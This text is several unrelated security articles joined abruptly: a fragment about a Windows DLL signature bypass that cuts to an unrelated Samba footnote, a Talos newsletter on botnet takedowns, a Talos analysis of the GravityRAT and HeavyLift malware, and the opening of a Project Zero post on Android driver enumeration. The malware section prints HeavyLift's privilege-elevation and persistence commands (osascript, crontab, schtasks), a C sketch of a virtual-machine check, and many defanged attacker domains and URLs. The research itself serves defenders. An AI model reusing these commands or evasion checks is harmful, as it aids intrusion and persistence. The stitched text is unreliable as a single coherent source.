We set out to increase our understanding of Windows internals by adapting research on DLL loading in impersonating services using WinSxS, but we got sidetracked into examining the code signing method used for DLL files, and we found a way to bypass it. While we were unable to apply it in the scenario we started out with, we did find other places where we could use it to elevate privileges, bypass WDAC and inject code into protected processes. Just like our previous research "Bad things come in large packages: .pkg signature verification bypass on macOS" about a signature bypass for macOS .pkg files, we see here that vulnerabilities in cryptographic operations can often be applied in a multitude of ways, allowing different security measures to be bypassed. Just like that example, this vulnerability could go from a user opening a downloaded file to full system compromise.


  1. There appears to be a disagreement between Samba and Windows about what an SMB2_FILE_FULL_EA_INFO GetInfo request means. Windows issues it to query the value of a specific EA, while Samba responds with all EAs on the file, which confuses Windows. Instead of trying to patch Samba to fix this, we resolved it by making sure the $KERNEL.PURGE.ESBCACHE EA is the only EA set on the file. ↩︎

How we can separate botnets from the malware operations that rely on them

As I covered in last week's newsletter, law enforcement agencies from around the globe have been touting recent botnet disruptions affecting some of the largest threat actors and malware families.

Operation Endgame, which Europol touted as the "largest ever operation against botnets," targeted malware droppers including IcedID, Trickbot, the Smokeloader malware loader, and more.

A separate disruption campaign targeted a botnet called “911 S5,” which the FBI said was used to “commit cyber attacks, large-scale fraud, child exploitation, harassment, bomb threats, and export violations.” 

But with these types of announcements, I think there can be confusion about what a botnet disruption means, exactly. As we've written about before in the case of the LockBit ransomware, botnet and server disruptions can certainly cause headaches for threat actors, but they usually do not amount to a complete shutdown of operations that forces a group offline forever.

I’m not saying that Operation Endgame and the 911 S5 disruption aren’t huge wins for defenders, but I do think it’s important to separate botnets from the malware and threat actors themselves.  

For the uninitiated, a botnet is a network of computers or other internet-connected devices that are infected by malware and controlled by a single threat actor or group. Larger botnets are often used to send spam emails in large volumes or carry out distributed denial-of-service attacks by using a mountain of IP addresses to send traffic to a specific target all in a short period. Smaller botnets might be used in targeted network intrusions, or financially motivated botnet controllers might be looking to steal money from targets. 

When law enforcement agencies remove devices from these botnets, it does disrupt actors' ability to carry out these actions, but it doesn't necessarily kill off the final payloads these actors usually deploy, such as ransomware.

When discussing this topic in relation to the Volt Typhoon APT, Kendall McKay from our threat intelligence team told me in the latest episode of Talos Takes that botnets should be viewed as a separate entity from a malware family or APT. In the case of Volt Typhoon, the FBI said earlier this year it had disrupted the Chinese APT's botnet, though McKay said "we're not sure yet" if this has had any tangible effects on their operations.

With past major botnet disruptions like Emotet and other Trickbot efforts, she also said that “eventually, those threats re-emerge, and the infected devices re-propagate [because] they have worm-like capabilities.” 

So, the next time you see headlines about a botnet disruption, know that yes, this is good news, but it’s also not time to start thinking the affected malware is gone forever.  

The one big thing 

This week, Cisco Talos disclosed a new malware campaign called "Operation Celestial Force" that has been running since at least 2018. It is still active today, employing GravityRAT, an Android-based malware, along with a Windows-based malware loader we track as "HeavyLift." Talos attributes this operation with high confidence to a Pakistani nexus of threat actors we're calling "Cosmic Leopard," focused on espionage and surveillance of their targets.

Why do I care? 

While this operation has been active for at least the past six years, Talos has observed a general uptick in the threat landscape in recent years with respect to the use of mobile malware for espionage against high-value targets, including the use of commercial spyware. There are two common ways this attacker targets users that you should be on the lookout for: one is spearphishing emails that look like they reference legitimate government-related documents and issues, and the other is social media-based phishing. Always be vigilant about anyone reaching out to you via direct messages on platforms like Twitter and LinkedIn.

So now what? 

Adversaries like Cosmic Leopard may use low-sophistication techniques such as social engineering and spear phishing, but will aggressively target potential victims with various TTPs. Therefore, organizations must remain vigilant against such motivated adversaries conducting targeted attacks, by educating users on proper cyber hygiene and implementing defense-in-depth models to protect against such attacks across various attack surfaces.

Top security headlines of the week 

Microsoft announced changes to its Recall AI service after privacy advocates and security engineers warned about the potential privacy dangers of such a feature. The Recall tool in Windows 11 takes continuous screenshots of users' activity, which can then be queried by the user to do things like locate files or remember the last thing they were working on. However, all that data collected by Recall is stored locally on the device, potentially opening the door to data theft if a machine were to be compromised. Now, Recall will be opt-in only, meaning it'll be turned off by default for users when it launches in an update to Windows 11. The feature will also be tied to the Windows Hello authentication protocol, meaning anyone who wants to look at their timeline needs to log in with face or fingerprint ID, or a unique PIN. After Recall's announcement, security researcher Kevin Beaumont discovered that the AI-powered feature stored data in a database in plain text. That could have made it easy for threat actors to create tools to extract the database and its contents. Now, Microsoft has also made it so that these screenshots and the search index database are encrypted, and are only decrypted if the user authenticates. (The Verge, CNET)

A data breach affecting cloud storage provider Snowflake has the potential to be one of the largest security events ever if the alleged number of affected users is accurate. Security researchers helping to address the attack targeting Snowflake said this week that financially motivated cybercriminals have stolen "a significant volume of data" from hundreds of customers. As many as 165 companies that use Snowflake could be affected, which is notable because Snowflake is generally used to store massive volumes of data on its servers. Breaches affecting Ticketmaster, Santander bank and Lending Tree have already been linked to the Snowflake incident. Incident responders working on the breach wrote this week that the attackers used stolen credentials to access customers' Snowflake instances and steal valuable data. The activity dates back to at least April 14. Reporters at online news outlet TechCrunch also found that hundreds of Snowflake customer credentials were available on the dark web, after malware infected Snowflake staffers' computers. The list poses an ongoing risk to any Snowflake users who had not changed their passwords as of the first disclosure of this breach or are not protected by multi-factor authentication. (TechCrunch, Wired)

Recovery from a cyber attack affecting several large hospitals in London could take several months, according to an official with the U.K.'s National Health Service. The affected hospitals and general practitioners' offices serve a combined 2 million patients. A recent cyber attack targeting a private firm called Synnovis that analyzes blood tests has forced these offices to reschedule appointments and cancel crucial surgeries. "It is unclear how long it will take for the services to get back to normal, but it is likely to take many months," the NHS official told The Guardian newspaper. Britain also had to put out a call for volunteers to donate type O blood as soon as possible, as the attack has made it more difficult for health care facilities to match patients' blood types at the same frequency as usual. Type O blood is generally known to be safe for all patients and is commonly used in major surgeries. (BBC, The Guardian)

Can’t get enough Talos? 

Upcoming events where you can find Talos 

Cisco Connect U.K. (June 25)

London, England

In a fireside chat, Cisco Talos experts Martin Lee and Hazel Burton discuss the most prominent cybersecurity threat trends of the near future, how these are likely to impact UK organizations in the coming years, and what steps we need to take to keep safe.

BlackHat USA (Aug. 3 – 8) 

Las Vegas, Nevada 

Defcon (Aug. 8 – 11) 

Las Vegas, Nevada 

BSides Krakow (Sept. 14)  

Krakow, Poland 

Most prevalent malware files from Talos telemetry over the past week 

SHA 256: 2d1a07754e76c65d324ab8e538fa74e5d5eb587acb260f9e56afbcf4f4848be5 
MD5: d3ee270a07df8e87246305187d471f68 
Typical Filename: iptray.exe 
Claimed Product: Cisco AMP 
Detection Name: Generic.XMRIGMiner.A.A13F9FCC

SHA 256: 9b2ebc5d554b33cb661f979db5b9f99d4a2f967639d73653f667370800ee105e 
MD5: ecbfdbb42cb98a597ef81abea193ac8f 
Typical Filename: N/A 
Claimed Product: MAPIToolkitConsole.exe 
Detection Name: Gen:Variant.Barys.460270 

SHA 256: 9be2103d3418d266de57143c2164b31c27dfa73c22e42137f3fe63a21f793202 
MD5: e4acf0e303e9f1371f029e013f902262 
Typical Filename: FileZilla_3.67.0_win64_sponsored2-setup.exe 
Claimed Product: FileZilla 
Detection Name: W32.Application.27hg.1201 

SHA 256: a024a18e27707738adcd7b5a740c5a93534b4b8c9d3b947f6d85740af19d17d0 
MD5: b4440eea7367c3fb04a89225df4022a6 
Typical Filename: Pdfixers.exe 
Claimed Product: Pdfixers 
Detection Name: W32.Superfluss:PUPgenPUP.27gq.1201 

SHA 256: 0e2263d4f239a5c39960ffa6b6b688faa7fc3075e130fe0d4599d5b95ef20647 
MD5: bbcf7a68f4164a9f5f5cb2d9f30d9790 
Typical Filename: bbcf7a68f4164a9f5f5cb2d9f30d9790.vir 
Claimed Product: N/A 
Detection Name: Win.Dropper.Scar::1201 

Operation Celestial Force employs mobile and desktop malware to target Indian entities

By Gi7w0rm, Asheer Malhotra and Vitor Ventura. 

  • Cisco Talos is disclosing a new malware campaign called "Operation Celestial Force" that has been running since at least 2018. It is still active today, employing GravityRAT, an Android-based malware, along with a Windows-based malware loader we track as "HeavyLift." 
  • All GravityRAT and HeavyLift infections are administered by a standalone tool we are calling “GravityAdmin,” which carries out malicious activities on an infected device. Analysis of the panel binaries reveals that they are meant to administer and run multiple campaigns at the same time, all of which are codenamed and have their own admin panels.  
  • Talos attributes this operation with high confidence to a Pakistani nexus of threat actors we’re calling “Cosmic Leopard,” focused on espionage and surveillance of their targets.  This multiyear operation continuously targeted Indian entities and individuals likely belonging to defense, government and related technology spaces. Talos initially disclosed the use of the Windows-based GravityRAT malware by suspected Pakistani threat actors in 2018 — also used to target Indian entities.  
  • While this operation has been active for at least the past six years, Talos has observed a general uptick in the threat landscape in recent years with respect to the use of mobile malware for espionage against high-value targets, including the use of commercial spyware.

Operation Celestial Force: A multi-campaign, multi-component infection operation 

Talos assesses with high confidence that this series of campaigns, which we're clustering under the umbrella of "Operation Celestial Force," is conducted by a nexus of Pakistani threat actors. The tactics, techniques, tooling and victimology of Cosmic Leopard contain some overlaps with those of Transparent Tribe, another suspected Pakistani APT group with a history of targeting high-value individuals on the Indian subcontinent. However, we do not have enough technical evidence to link the two threat actors together, so for now we track this cluster of activity under the "Cosmic Leopard" tag.

Operation Celestial Force has been active since at least 2018 and continues to operate today — increasingly utilizing an expanding and evolving malware suite — indicating that the operation has likely seen a high degree of success targeting users in the Indian subcontinent. Cosmic Leopard initially began the operation with the creation and deployment of the Windows-based GravityRAT malware family, distributed via malicious documents (maldocs). Around 2019, Cosmic Leopard created Android-based versions of GravityRAT to widen its net of infections and begin targeting mobile devices. The same year, Cosmic Leopard also expanded its arsenal with the HeavyLift malware loader. HeavyLift is primarily wrapped in malicious installers sent to targets, who are tricked into running the malware via social engineering techniques.

Some campaigns from this multi-year operation have been disclosed and loosely attributed to Pakistani threat actors in previous reporting. However, there has been little evidence to tie all of them together until now. Each campaign in the operation has been codenamed by the threat actor and managed/administered using custom-built panel binaries we call “GravityAdmin.” 

Adversaries like Cosmic Leopard may use low-sophistication techniques such as social engineering and spear phishing, but will aggressively target potential victims with various TTPs. Therefore, organizations must remain vigilant against such motivated adversaries conducting targeted attacks by educating users on proper cyber hygiene and implementing defense-in-depth models to protect against such attacks across various attack surfaces.

Initiating contact and infecting targets 

This campaign primarily utilizes two infection vectors — spear phishing and social engineering. Spear phishing consists of messages sent to targets with pertinent language and maldocs that contain malware such as GravityRAT. 

The other infection vector, which has gained popularity in this operation and is now a staple of Cosmic Leopard's tradecraft, consists of contacting targets over social media channels, establishing trust with them, and eventually sending them a malicious link to download either the Windows- or Android-based GravityRAT or the Windows-based loader, HeavyLift.

Malicious drop site delivering HeavyLift.

Operation Celestial Force’s malware and its management interfaces 

Talos’ analysis reveals the use of multiple components, including Android- and Windows-based malware, and administrative binaries supporting multiple campaign panels used by Operation Celestial Force. 

  • GravityRAT: GravityRAT, a closed-source malware family, first disclosed by Talos in 2018, is a Windows- and Android-based RAT used to target Indian entities.  
  • HeavyLift: A previously unknown Electron-based malware loader family distributed via malicious installers targeting the Windows operating system.  
  • GravityAdmin: A tool to administer infected systems (a panel binary), used by operators since at least 2021, by connecting to GravityRAT's and HeavyLift's C2 servers. GravityAdmin consists of multiple built-in user interfaces (UIs) that correspond to specific codenamed campaigns run by the malicious operators. 

Operation Celestial Force’s infection chains are:  

Diagram of Operation Celestial Force's infection chains.

GravityAdmin: Panel binaries administering the campaigns 

The panel binaries we analyzed span multiple versions, the earliest compiled in August 2021. When run, the panel binary asks the operator for a user ID, password and campaign ID (from a drop-down menu).

Login screen for GravityAdmin, titled "Bits Before Bullets."

When the operator clicks the login button, the executable checks whether it is connected to the internet by sending a ping request to www[.]google[.]com. Then, the user ID and password are authenticated against an authentication server, which sends back: 

  • A code directing the panel binary to open the UI for the specified campaign. 
  • A value in the HTTP "Authorization" header, which acts as an authentication token when communicating with campaign-specific C2 servers to load data such as the list of infected machines. 

A typical Panel screen will list the machines infected as part of the specific campaign. It also has buttons to trigger various malicious actions against one or more infected systems.  


Different panels have different capabilities; however, some core capabilities are common across all campaigns. 

The various campaigns configured in the panel binaries are codenamed as follows: 

  • "SIERRA" 
  • "QUEBEC" 
  • "ZULU" 
  • "DROPPER" 
  • "WORDDROPPER" 
  • "COMICUM" 
  • "ROCKAMORE" 
  • "FOXTROT" 
  • "CLOUDINFINITY" 
  • "RECOVERBIN" 
  • "CVSCOUT" 
  • "WEBBUCKET" 
  • "CRAFTWITHME" 
  • "SEXYBER" 
  • "CHATICO" 

Each of the codenamed campaigns from the panel binaries has its own infection mechanisms. For example, "FOXTROT," "CLOUDINFINITY" and "CHATICO" are names given to all Android-based GravityRAT infections, whereas "CRAFTWITHME," "SEXYBER" and "CVSCOUT" are named for attacks deploying HeavyLift. Our analysis correlates the campaigns listed above with the operating systems targeted and the malware families used:

Campaign Name | Platform targeted and malware used
SIERRA | Windows, GravityRAT
QUEBEC | Windows, GravityRAT
ZULU | Windows, GravityRAT
DROPPER / WORDDROPPER / COMICUM | Windows, GravityRAT
ROCKAMORE | Windows, GravityRAT
FOXTROT / CLOUDINFINITY / RECOVERBIN / CHATICO | Android, GravityRAT
CVSCOUT | Windows, HeavyLift
WEBBUCKET / CRAFTWITHME | Windows, HeavyLift
SEXYBER | Windows, HeavyLift

Several campaigns overlap in infrastructure with one another, mostly to host malicious payloads or maintain lists of infected systems. 

Malicious domain | Campaigns using the domain
mozillasecurity[.]com | SIERRA, QUEBEC, DROPPER
officelibraries[.]com | SIERRA, DROPPER, ZULU

GravityRAT: A multi-platform remote access trojan

GravityRAT is a Windows-based remote access trojan first disclosed by Talos in 2018 and later ported to the Android operating system, around 2019, to target mobile devices. Since 2019, we've observed the continuous addition of a multitude of capabilities to GravityRAT and its associated infrastructure. So far, we have observed the use of GravityRAT exclusively by suspected Pakistani threat actors to target entities and individuals in India. There is currently no publicly available evidence to suggest that GravityRAT is commodity or open-source malware that could be used by multiple, disparate threat actors.

Our analysis of the entire ecosystem of Operation Celestial Force revealed that GravityRAT’s use in this campaign likely began as early as 2016 and continues to this day. 

The latest variants of GravityRAT are distributed through malicious websites, some registered and set up as recently as early January 2024, that pretend to distribute legitimate Android applications. Malicious operators distribute the download links to their targets over social media channels, asking them to download and install the malware.

The latest variants of GravityRAT use the previously mentioned code names to define the campaigns. The screenshot below shows the initial registration of a victim with the C2, which returns a list of alternative C2 servers to be used if needed.

Victim registration with the C2. The group uses the Cloudflare service to hide the true location of its C2 servers.

After registration, the trojan requests tasks to execute from the C2, then uploads a file containing the device's location.

The trojan will use a different user-agent for each request — it's unclear if this is done on purpose, or if this anomaly is just the result of cut-and-paste code from other projects to tie together this trojan’s features.  

GravityRAT requests the following permissions on the device for stealing information and housekeeping tasks. 

Permissions requested by GravityRAT on the device.

These variants of GravityRAT are similar to previously disclosed versions from ESET and Cyble and consist of the following capabilities: 

  1. Send preliminary information about the device to the C2. This information includes IMEI, phone number, network country ISO code, network operator name, SIM country ISO code, SIM operator name, SIM serial number, device model, brand, product and manufacturer, addresses surrounding the obtained longitude and latitude of the device and the current build information, including release, host, etc. 
  2. Read SMS data and content and upload to the C2. 
  3. Read specific file formats and upload them to the C2. 
  4. Read call logs and upload them to the C2. 
  5. Obtain IMEI information including associated email ID and send it to C2. 
  6. Delete all contacts, call logs and files related to the malware. 

HeavyLift: Electron-based malware loader

Some of the campaigns in this operation use an Electron-based malware loader we're calling "HeavyLift," which consists of JavaScript code communicating with, and controlled by, C2 servers. These are the same C2 servers that interact with GravityAdmin, the panel tool used by the operators to govern infected systems. HeavyLift is essentially a stage-one malware component that downloads and installs other malicious implants whenever they become available on the C2 server. HeavyLift bears some similarities to GravityRAT's Electron versions disclosed by Kaspersky in 2020.

A HeavyLift infection begins with an executable masquerading as an installer for a legitimate application. The installer installs a dummy application but also installs and sets up a malicious Electron-based desktop application. This malicious application is, in fact, HeavyLift and consists of JavaScript code that carries out malicious operations on the infected system. 

On execution, HeavyLift checks whether it is running on macOS or Windows. On macOS, if it is not running as root, it relaunches itself with admin privileges using the command: 

/usr/bin/osascript -e 'do shell script "bash -c \"_process_path_\"" with administrator privileges'

If it is running as root, it will set the default HTTP User-Agent to “M_9C9353252222ABD88B123CE5A78B70F6”, then get system info using the commands: 

system_profiler SPHardwareDataType | grep 'Model Name' 

system_profiler SPHardwareDataType | grep 'SMC' 

system_profiler SPHardwareDataType | grep 'Model Identifier' 

system_profiler SPHardwareDataType | grep 'ROM' 

system_profiler SPHardwareDataType | grep 'Serial Number'  

For a Windows-based system, the HTTP User-Agent is set to “W_9C9353252222ABD88B123CE5A78B70F6”. The malware will then obtain preliminary system information such as: 

  • Processor ID 
  • MAC address 
  • Installed anti-virus product name 
  • Username 
  • Domain name 
  • Platform information 
  • Process, OS architecture 
  • Agent (hardcoded value) 
  • OS release number 

All this preliminary information is sent to the hardcoded C2 server URL to register the infection with the C2. 

HeavyLift will then reach out to the C2 server to poll for any new payloads to execute on the infected system. A payload received from the C2 will be dropped to a directory in the “AppData” directory and persisted on the system. 

On macOS, the payload is a ZIP file that is extracted, and the resulting binary persists using crontab via the command: 

crontab -l 2>/dev/null; echo '*/2 * * * * "_filepath_" _arguments_' | crontab -

For Windows, the payload received is an EXE file that persists on the system via a scheduled task. The malware creates an XML file describing the scheduled task, with the payload path, arguments and working directory, and then uses the XML to register the task:

SCHTASKS /Create /XML "_xmlpath_" /TN "_taskname_" /F 

The malware will then open the accompanying HTML file via web view to appear legitimate. 

 In some cases, the malware will also perform anti-analysis checks to see if it’s running in a virtual environment.  

It checks for the presence of specific keywords and exits if there is a match: 

  • Innotek GmbH 
  • VirtualBox 
  • VMware 
  • Microsoft Corporation 
  • HITACHI

On macOS, these keywords are checked against the model information, SMC, ROM and serial numbers; on Windows, against manufacturer information such as product, vendor, processor and more.
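On the Windows side, such a check often boils down to reading firmware strings from the registry and matching them against the list; a minimal sketch of the idea (the exact mechanism HeavyLift uses may differ):

#include <windows.h>
#include <stdio.h>
#include <string.h>
#pragma comment(lib, "advapi32.lib")

int main(void)
{
    const char *keywords[] = { "Innotek GmbH", "VirtualBox", "VMware",
                               "Microsoft Corporation", "HITACHI" };
    char vendor[256] = {0};
    DWORD size = sizeof(vendor);

    // SystemManufacturer is a standard value populated from SMBIOS.
    if (RegGetValueA(HKEY_LOCAL_MACHINE,
                     "HARDWARE\\DESCRIPTION\\System\\BIOS",
                     "SystemManufacturer", RRF_RT_REG_SZ,
                     NULL, vendor, &size) == ERROR_SUCCESS) {
        for (size_t i = 0; i < sizeof(keywords) / sizeof(keywords[0]); i++) {
            if (strstr(vendor, keywords[i])) {
                printf("VM keyword matched: %s\n", keywords[i]);
                return 1; // the malware would exit here
            }
        }
    }
    printf("no VM keyword matched\n");
    return 0;
}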

Coverage 

Ways our customers can detect and block this threat are listed below.  


 Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.  

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.  

 Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.  

 Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.  

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.  

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.  

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.  

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.  

 Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.  

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

IOCs 

IOCs for this research can also be found in our GitHub repository here.

HeavyLift 

8e9bcc00fc32ddc612bdc0f1465fc79b40fc9e2df1003d452885e7e10feab1ee
ceb7b757b89693373ffa1c46dd96544bdc25d1a47608c2ea24578294bcf1db37 
06b617aa8c38f916de8553ff6f572dcaa96e5c8941063c55b6c424289038c3a1 
da3907cf75662c3401581a5140831f8b2520a4c3645257b3860c7db94295af88 
838fd5d269fa09ef4f7e9f586b6577a9f46123a0af551de02de78501d916236d 
12d98137cd1b0cf59ce2fafbfe3a9c3477a42dae840909adad5d4d9f05dd8ede 
688c8e4522061bb9d82e4c3584f7ef8afc6f9e07e2374567755faad2a22e25b8 
5695c1e5e4b381844a36d8281126eef73a9641a315f3fdd2eb475c9073c5f4da 
8d458fb59b6da20e1ba1658bb4a1f7dbb46d894530878e91b64d3c675d3d4516

GravityRAT Android 

36851d1da9b2f35da92d70d4c88ea1675f1059d68fafd3abb1099e075512b45e 
4ebdfa738ef74945f6165e337050889dfa0aad61115b738672bbeda648a59dab 
1382997d3a5bb9bdbb9d41bb84c916784591c7cdae68305c3177f327d8a63b71 
c00cedd6579e01187cd256736b8a506c168c6770776475e8327631df2181fae2 
380df073825aca1e2fdbea379431c2f4571a8c7d9369e207a31d2479fbc7be88

GravityAdmin 

63a76ca25a5e1e1cf6f0ca8d32ce14980736195e4e2990682b3294b125d241cf 
69414a0ca1de6b2ab7b504a507d35c859fc5a1b8e0b3cf0c6a8948b2f652cbe9 
04e216f4780b6292ccc836fa0481607c62abb244f6a2eedc21c4a822bcf6d79f

Network IOCs 

 androidmetricsasia[.]com 
dl01[.]mozillasecurity[.]com 
officelibraries[.]com 
javacdnlib[.]com 
windowsupdatecloud[.]com 
webbucket[.]co[.]uk 
craftwithme[.]uk 
sexyber[.]net 
rockamore[.]co[.]uk 
androidsdkstream[.]com 
playstoreapi[.]net 
sdklibraries[.]com 
cvscout[.]uk 
zclouddrive[.]com 
jdklibraries[.]com 
cloudieapp[.]net 
androidadbserver[.]com 
androidwebkit[.]com 
teraspace[.]co[.]in

hxxps[://]zclouddrive[.]com/downloads/CloudDrive_Setup_1[.]0[.]1[.]exe 
hxxps[://]www[.]sexyber[.]net/downloads/7ddf32e17a6ac5ce04a8ecbf782ca509/Sexyber-1[.]0[.]0[.]zip 
hxxps[://]sexyber[.]net/downloads/7ddf32e17a6ac5ce04a8ecbf782ca509/Sexyber-1[.]0[.]0[.]zip 
hxxps[://]cloudieapp[.]net/cloudie[.]zip 
hxxps[://]sni1[.]androidmetricsasia[.]com/voilet/8a99d28c[.]php 
hxxps[://]dev[.]androidadbserver[.]com/jurassic/6c67d428[.]php 
hxxps[://]adb[.]androidadbserver[.]com/jurassic/6c67d428[.]php 
hxxps[://]library[.]androidwebkit[.]com/kangaroo/8a99d28c[.]php 
hxxps[://]ux[.]androidwebkit[.]com/kangaroo/8a99d28c[.]php 
hxxps[://]jupiter[.]playstoreapi[.]net/indigo/8a99d28c[.]php 
hxxps[://]moon[.]playstoreapi[.]net/indigo/8a99d28c[.]php 
hxxps[://]jre[.]jdklibraries[.]com/hotriculture/671e00eb[.]php  
hxxps[://]cloudinfinity-d4049-default-rtdb[.]firebaseio[.]com/ 
hxxps[://]dl01[.]mozillasecurity[.]com/ 
hxxps[://]dl01[.]mozillasecurity[.]com/Sier/resauth[.]php 
hxxps[://]dl01[.]mozillasecurity[.]com/resauth[.]php/ 
hxxps[://]tl37[.]officelibraries[.]com/Sier/resauth[.]php 
hxxps[://]tl37[.]officelibraries[.]com/resauth[.]php/ 
hxxps[://]jun[.]javacdnlib[.]com/Quebec/5be977ac[.]php 
hxxps[://]dl01[.]mozillasecurity[.]com/MicrosoftUpdates/6efbb147[.]php 
hxxps[://]tl37[.]officelibraries[.]com/MicrosoftUpdates/741bbfe6[.]php 
hxxps[://]tl37[.]officelibraries[.]com/MsWordUpdates/c47d1870[.]php 
hxxps[://]dl01[.]windowsupdatecloud[.]com/opex/7ab24931[.]php 
hxxps[://]tl37[.]officelibraries[.]com/opex/13942BA7[.]php 
hxxp[://]dl01[.]windowsupdatecloud[.]com/opex/7ab24931[.]php 
hxxps[://]download[.]rockamore[.]co[.]uk/m2c/m_client[.]php 
hxxps[://]api1[.]androidsdkstream[.]com/foxtrot/ 
hxxps[://]api1[.]androidsdkstream[.]com/foxtrot/61c10953[.]php 
hxxps[://]jupiter[.]playstoreapi[.]net/RB/e7a18a38[.]php 
hxxps[://]sdk2[.]sdklibraries[.]com/golf/c6cf642b[.]php 
hxxps[://]api1[.]androidsdkstream[.]com/foxtrot//DataX/
hxxps[://]download[.]cvscout[.]uk/cvscout/cvstyler_client[.]php 
hxxps[://]download[.]webbucket[.]co[.]uk/webbucket/strong_client[.]php 
hxxps[://]www[.]craftwithme[.]uk/cwmb/craftwithme/strong_client[.]php 
hxxps[://]download[.]sexyber[.]net/sexyber/sexyberC[.]php 
hxxps[://]download[.]webbucket[.]co[.]uk/A0B74607[.]php 
hxxps[://]zclouddrive[.]com/system/546F9A[.]php 
hxxps[://]download[.]cvscout[.]uk/cvscout/ 
hxxps[://]download[.]cvscout[.]uk/c9a5e83c[.]php 
hxxps[://]zclouddrive[.]com/system/clouddrive/ 
hxxps[://]download[.]sexyber[.]net/0fb1e3a0[.]php 
hxxps[://]www[.]craftwithme[.]uk/cwmb/d26873c6[.]php 
hxxps[://]download[.]teraspace[.]co[.]in/teraspace/ 
hxxps[://]download[.]teraspace[.]co[.]in/78181D14[.]php 
hxxps[://]www[.]craftwithme[.]uk/cwmb/craftwithme/ 
hxxps[://]download[.]webbucket[.]co[.]uk/webbucket/

Driving forward in Android drivers

Posted by Seth Jenkins, Google Project Zero

Introduction

Android's open-source ecosystem has led to an incredible diversity of manufacturers and vendors developing software that runs on a broad variety of hardware. This hardware requires supporting drivers, meaning that many different codebases carry the potential to compromise a significant segment of Android phones. There are recent public examples of third-party drivers containing serious vulnerabilities that are exploited on Android. While there exists a well-established body of public (and In-the-Wild) security research on Android GPU drivers, other chipset components may not be as frequently audited, so this research sought to explore those drivers in greater detail.

Driver Enumeration: Not as Easy as it Looks

This research focused on three Android devices (chipset manufacturers in parentheses):

- Google Pixel 7 (Tensor)

- Xiaomi 11T (MediaTek)

- Asus ROG 6D (MediaTek)

In order to perform driver research on these devices, I first had to find all of the kernel drivers that were accessible from an unprivileged context on each device; a task complicated by the non-uniformity of kernel drivers (and their permissions structures) across different devices, even within the same chipset manufacturer. There are several different methodologies for discovering these drivers. The most straightforward technique is to search the associated filesystems looking for exposed driver device files. These files serve as the primary method by which userland can interact with the driver. Normally the “file” is open’d by a userland process, which then uses a combination of read, write, ioctl, or even mmap to interact with the driver. The driver then “translates” those interactions into manipulations of the underlying hardware device, sending the output of that device back to userland as warranted. Effectively all drivers expose their interfaces through the ProcFS or DevFS filesystems, so I focused on the /proc and /dev directories while searching for viable attack surfaces. Theoretically, evaluating all the userland-accessible drivers should be as simple as calling find /dev or find /proc, attempting to open every file discovered, and logging which open attempts were successful.
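A minimal sketch of that probe, as a standalone binary one might push to the device (purely illustrative; a real tool would bound the /proc recursion and handle error cases more carefully):

// Minimal sketch: walk /dev and /proc, attempt to open each file, and
// log which opens succeed from the current (unprivileged) context.
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <dirent.h>
#include <limits.h>
#include <sys/stat.h>

static void probe_dir(const char *dir)
{
    DIR *d = opendir(dir);
    if (!d)
        return; /* SELinux may deny listing even when children are openable */
    struct dirent *e;
    while ((e = readdir(d)) != NULL) {
        if (!strcmp(e->d_name, ".") || !strcmp(e->d_name, ".."))
            continue;
        char path[PATH_MAX];
        snprintf(path, sizeof(path), "%s/%s", dir, e->d_name);
        struct stat st;
        if (lstat(path, &st) != 0)
            continue;
        if (S_ISDIR(st.st_mode)) { /* lstat skips symlinked dirs */
            probe_dir(path);
            continue;
        }
        /* O_NONBLOCK: some device/proc files block on open */
        int fd = open(path, O_RDONLY | O_NONBLOCK);
        if (fd >= 0) {
            printf("openable: %s\n", path);
            close(fd);
        }
    }
    closedir(d);
}

int main(void)
{
    probe_dir("/dev");
    probe_dir("/proc");
    return 0;
}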

However, there is one major roadblock that prevents this approach from being comprehensive: permissions! SELinux and traditional Linux Discretionary Access Control policies can prevent simple filesystem enumeration from discovering all of the accessible device drivers on the filesystem. For example, the untrusted_app SELinux context has search permission on the device SELinux context for directories, but is not allowed to directly open the directory itself:

sepolicy shows search permission on the "device" SELinux context

This search permission (rather counterintuitively) does not allow the source context to list the contents of directories that have this SELinux target context. Instead, it simply allows such a directory to be in the ancestor directories of the file path that the source context attempts to open. In practice, this means that untrusted_app is allowed to open e.g. /dev/mali0 but is usually not allowed to open /dev itself:

untrusted_app is unable to list /dev but can open files within it like /dev/mali0

In the case of /dev, the shell context is allowed to open and list the contents of /dev. That means that by first enumerating the /dev directory from the shell context, then attempting to open all discovered files from the untrusted_app context, a security researcher can understand what drivers are and are not accessible from an app context in the /dev directory. However, there are cases where certain directories are simply not listable from a debugging-accessible non-root context, particularly in /proc. One option to enumerate all these directories would be to root the phone; however, this is not always easily achievable.

A strategy I found helpful in this regard was to examine publicly released kernel source code for the phone model or for similar phone models. The location of this source code varies significantly from manufacturer to manufacturer, but it is usually hosted either on GitHub or on the manufacturer's website. Device drivers create files in /proc primarily via the proc_create() and proc_mkdir() function calls. A real-world example of this would be:

        parent = proc_mkdir("perfmgr", NULL);
        perfmgr_root = parent;
        pe = proc_create("perf_ioctl", 0664, parent, &Fops);
        ...
        pe = proc_create("eara_ioctl", 0664, parent, &eara_Fops);
        ...
        pe = proc_create("eas_ioctl", 0664, parent, &eas_Fops);
        ...
        pe = proc_create("xgff_ioctl", 0664, parent, &xgff_Fops);
        ...

Although these files cannot be directly enumerated, they do exist and are accessible from an untrusted context.

/proc/perfmgr directory contents cannot be listed with ls, but can be open'd

Discovering this driver without analyzing the kernel source code would otherwise have required rooting the phone.

